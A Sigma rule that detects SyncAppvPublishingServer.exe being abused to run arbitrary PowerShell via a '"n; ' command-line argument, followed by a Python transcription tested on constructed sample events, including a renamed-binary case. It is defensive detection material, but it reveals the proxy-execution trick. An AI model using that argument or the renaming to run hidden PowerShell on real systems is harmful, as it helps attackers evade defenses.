SyncAppvPublishingServer Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.

Sigma rule

title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
id: fbd7c32d-db2a-4418-b92c-566eb8911133
related:
    - id: fde7929d-8beb-4a4c-b922-be9974671667
      type: obsoletes
status: test
description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
author: frack113
date: 2021/07/12
modified: 2022/10/04
tags:
    - attack.defense_evasion
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\SyncAppvPublishingServer.exe'
        - OriginalFileName: 'syncappvpublishingserver.exe'
    selection_cli:
        CommandLine|contains: '"n; '
    condition: all of selection_*
fields:
    - ComputerName
    - User
    - CommandLine
    - ParentCommandLine
falsepositives:
    - App-V clients
level: medium
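
The detection block of the rule above, transcribed into Python and run over a few constructed process-creation events. This is an added illustration, not code from the Sigma project or the rule author; the host names, users, paths and sample command lines are made up, and the `SYSTEM32` constant and function names are this example's own.

```python
# Detection block of the rule above, transcribed into Python (added example).
IMAGE_SUFFIX = "\\syncappvpublishingserver.exe"      # Image|endswith
ORIGINAL_FILE_NAME = "syncappvpublishingserver.exe"  # OriginalFileName
CLI_MARKER = '"n; '                                  # CommandLine|contains
ALERT_FIELDS = ("ComputerName", "User", "CommandLine", "ParentCommandLine")

def selection_img(event: dict) -> bool:
    # Items listed under one selection are OR-ed; Sigma string matching is
    # case-insensitive by default, hence the lower-casing on both sides.
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith(IMAGE_SUFFIX) or original == ORIGINAL_FILE_NAME

def selection_cli(event: dict) -> bool:
    # The space after the semicolon is what the rule keys on; a plain
    # "n;<value>" argument without it does not contain the marker.
    return CLI_MARKER in event.get("CommandLine", "").lower()

def matches(event: dict) -> bool:
    # condition: all of selection_*
    return selection_img(event) and selection_cli(event)

def run_rule(events):
    # Emit the rule's 'fields' for every matching event.
    return [{k: e.get(k, "") for k in ALERT_FIELDS} for e in events if matches(e)]

# Constructed sample events (hosts, users, paths and arguments are made up).
SYSTEM32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    # 1: "n;<value>" with no space after the semicolon: marker absent, not flagged
    {"ComputerName": "WS01", "User": "CORP\\alice", "ParentCommandLine": "explorer.exe",
     "Image": SYSTEM32 + "SyncAppvPublishingServer.exe", "OriginalFileName": "syncappvpublishingserver.exe",
     "CommandLine": 'SyncAppvPublishingServer.exe "n;http://appv.corp.example/"'},
    # 2: PowerShell passed through the argument: both selections match, flagged
    {"ComputerName": "WS02", "User": "CORP\\bob", "ParentCommandLine": "cmd.exe",
     "Image": SYSTEM32 + "SyncAppvPublishingServer.exe", "OriginalFileName": "syncappvpublishingserver.exe",
     "CommandLine": 'SyncAppvPublishingServer.exe "n; Write-Host constructed"'},
    # 3: renamed copy of the binary: OriginalFileName still matches, flagged
    {"ComputerName": "WS03", "User": "CORP\\carol", "ParentCommandLine": "explorer.exe",
     "Image": "C:\\Users\\Public\\svc.exe", "OriginalFileName": "SyncAppvPublishingServer.exe",
     "CommandLine": 'svc.exe "n; Write-Host constructed"'},
    # 4: unrelated process carrying the same marker: selection_img fails, not flagged
    {"ComputerName": "WS04", "User": "CORP\\dave", "ParentCommandLine": "explorer.exe",
     "Image": SYSTEM32 + "notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": 'notepad.exe "n; notes.txt"'},
]

if __name__ == "__main__":
    print(run_rule(SAMPLE_EVENTS))
```

Events 2 and 3 produce alerts; event 3 shows why the OriginalFileName branch matters once the binary is copied under another name.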
